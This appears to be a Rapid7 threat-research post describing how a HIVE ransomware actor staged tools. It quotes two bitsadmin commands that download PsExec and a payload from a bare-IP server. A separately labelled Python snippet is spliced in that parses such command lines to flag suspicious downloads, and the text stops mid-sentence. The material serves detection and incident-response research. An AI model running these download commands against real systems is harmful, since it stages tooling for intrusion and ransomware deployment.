Increasing The Sting of HIVE Ransomware


How malicious actors evade detection and disable defenses for more destructive HIVE Ransomware attacks.

Rapid7 routinely conducts research into the wide range of techniques that threat actors use to conduct malicious activity. One objective of this research is to discover new techniques being used in the wild, so we can develop new detection and response capabilities.

Recently, Rapid7 observed a malicious actor performing several known techniques for distributing ransomware across many systems within a victim’s environment. In addition to those techniques, the actor employed a number of previously unseen techniques designed to drop the victim's defenses, inhibit monitoring, disable networking and allow time for the ransomware to finish encrypting files. These extra steps would make it extremely difficult, if not impossible, for a victim to effectively use their security tools to defend endpoints after a certain point in the attack.

Rapid7 has updated existing InsightIDR detections and added new ones to defend against these techniques. In this article, we’ll explore the techniques employed by the threat actor, why they’re so effective, and how we’ve updated InsightIDR to protect against them.

What approach did the malicious actor take to prepare the victim's environment?

Initially using Cobalt Strike, the malicious actor retrieved system administration tools and malicious payloads with the Background Intelligent Transfer Service command-line tool (BITSAdmin).

"C:\Windows\system32\bitsadmin.exe" /transfer debjob /download /priority normal http://79.137.206.47/PsExec.exe C:\Users\Public\PsExec.exe

bitsadmin /transfer debjob /download /priority normal http://79.137.206.47/int.exe C:\Windows\int.exe
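As an added example (not code from the Rapid7 post or from InsightIDR), the following Python triage logic parses process-creation command lines for the BITSAdmin transfer pattern shown above and scores each download on three traits: a bare-IP source URL, an executable destination, and a staging directory. The sample events, staging-directory list and extension list are constructed assumptions to be tuned per environment.

```python
import re
from dataclasses import dataclass, field

# Constructed sample process-creation command lines, as an EDR/Sysmon sensor
# would record them. The first two mirror the BITSAdmin commands quoted above.
SAMPLE_EVENTS = [
    r'"C:\Windows\system32\bitsadmin.exe" /transfer debjob /download /priority normal http://79.137.206.47/PsExec.exe C:\Users\Public\PsExec.exe',
    r'bitsadmin /transfer debjob /download /priority normal http://79.137.206.47/int.exe C:\Windows\int.exe',
    r'bitsadmin /transfer updjob /download /priority low https://updates.example.internal/patch.msi C:\ProgramData\Patches\patch.msi',
    r'bitsadmin /list /allusers',
]

IP_URL = re.compile(r'^https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)', re.I)
EXEC_EXT = ('.exe', '.dll', '.ps1', '.bat', '.cmd', '.vbs', '.js', '.scr')
# Assumed list of directories commonly used to stage tooling; tune per environment.
STAGING_DIRS = ('c:\\users\\public\\', 'c:\\windows\\', 'c:\\programdata\\', 'c:\\perflogs\\')
TOKEN = re.compile(r'"[^"]*"|\S+')  # split on whitespace, keeping quoted paths whole

@dataclass
class Finding:
    url: str
    dest: str
    reasons: list = field(default_factory=list)

def parse_bitsadmin(cmdline):
    """Return (url, dest) for a 'bitsadmin /transfer' download, else None."""
    argv = [t.strip('"') for t in TOKEN.findall(cmdline)]
    if len(argv) < 4 or argv[0].lower().rsplit('\\', 1)[-1] not in ('bitsadmin', 'bitsadmin.exe'):
        return None
    flags = {a.lower() for a in argv[1:] if a.startswith('/')}
    # /transfer defaults to a download; only /upload variants are not of interest here
    if '/transfer' not in flags or '/upload' in flags or '/upload-reply' in flags:
        return None
    url, dest = argv[-2], argv[-1]  # syntax: /transfer <job> [type] [/priority p] <URL> <local file>
    return (url, dest) if url.lower().startswith(('http://', 'https://')) else None

def assess(cmdline):
    """Score one command line; None if it is not a BITS download at all."""
    parsed = parse_bitsadmin(cmdline)
    if parsed is None:
        return None
    url, dest = parsed
    f, low = Finding(url, dest), dest.lower()
    if IP_URL.match(url):
        f.reasons.append('download from bare IP address')
    if low.endswith(EXEC_EXT):
        f.reasons.append('executable payload')
    if low.startswith(STAGING_DIRS):
        f.reasons.append('staged in ' + dest.rsplit('\\', 1)[0])
    return f

def triage(events, min_reasons=2):
    """Return findings carrying at least min_reasons suspicious traits."""
    return [f for f in map(assess, events) if f and len(f.reasons) >= min_reasons]
```

Run against the sample events, `triage` flags the two PsExec.exe and int.exe downloads and leaves the internal MSI patch download and the `/list` query alone.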

The malicious actor then began using the remote process execution tool ..
